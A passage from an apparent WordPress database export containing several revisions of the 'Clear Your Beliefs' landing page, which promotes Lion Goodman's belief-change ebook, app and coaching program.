This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-09 17:14:26', '2014-10-09 22:14:26', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1513, 2, '2014-10-09 17:13:49', '2014-10-09 22:13:49', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n<p>Step 1</p><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /><p> [Form id="10"] </p>Step 2\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\nStep 3\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance, Love,\nRelationships, and\nManifesting What You Want</strong>\n\n<p style="text-align: center; margin-bottom: 70px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-09 17:13:49', '2014-10-09 22:13:49', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1515, 2, '2014-10-09 17:16:46', '2014-10-09 22:16:46', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n<p>Step 1</p><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /><p>[Form id="10"] </p>Step 2\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\nStep 3\n<p style="text-align: center"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center;margin-bottom: 70px"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-09 17:16:46', '2014-10-09 22:16:46', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1516, 2, '2014-10-09 17:18:30', '2014-10-09 22:18:30', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n<p>Step 1</p><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /><p>[Form id="10"] </p>Step 2\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center"><strong>Start Clearing WhateverIs In The Way RightNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\nStep 3\n<p style="text-align: center"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n<p style="text-align: center"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n<p style="text-align: center"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong><p style="text-align: center;margin-bottom: 70px"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-09 17:18:30', '2014-10-09 22:18:30', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1517, 2, '2014-10-09 17:34:48', '2014-10-09 22:34:48', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n<p>Step 1</p><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /><p>[Form id="10"] </p>Step 2\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing WhateverIs In The Way RightNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\nStep 3\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong><p style="text-align: center; margin-bottom: 70px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-09 17:34:48', '2014-10-09 22:34:48', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1518, 2, '2014-10-09 21:17:00', '2014-10-10 02:17:00', '', 'video-shadow', '', 'inherit', 'closed', 'open', '', 'video-shadow', '', '', '2014-10-09 21:17:00', '2014-10-10 02:17:00', '', 0, 'http://clearyourbeliefs.com/wp-content/uploads/2014/10/video-shadow.png', 0, 'attachment', 'image/png', 0),
(1520, 2, '2014-10-09 21:23:53', '2014-10-10 02:23:53', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\n<p>Step 1</p><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /><p>[Form id="10"] </p>Step 2\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing WhateverIs In The Way RightNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\nStep 3\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong><p style="text-align: center; margin-bottom: 70px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-09 21:23:53', '2014-10-10 02:23:53', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1519, 2, '2014-10-09 21:18:10', '2014-10-10 02:18:10', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n<p>\n</p>\n\n<p>Step 1</p><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /><p>[Form id="10"] </p>Step 2\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing WhateverIs In The Way RightNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\nStep 3\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong><p style="text-align: center; margin-bottom: 70px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-09 21:18:10', '2014-10-10 02:18:10', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
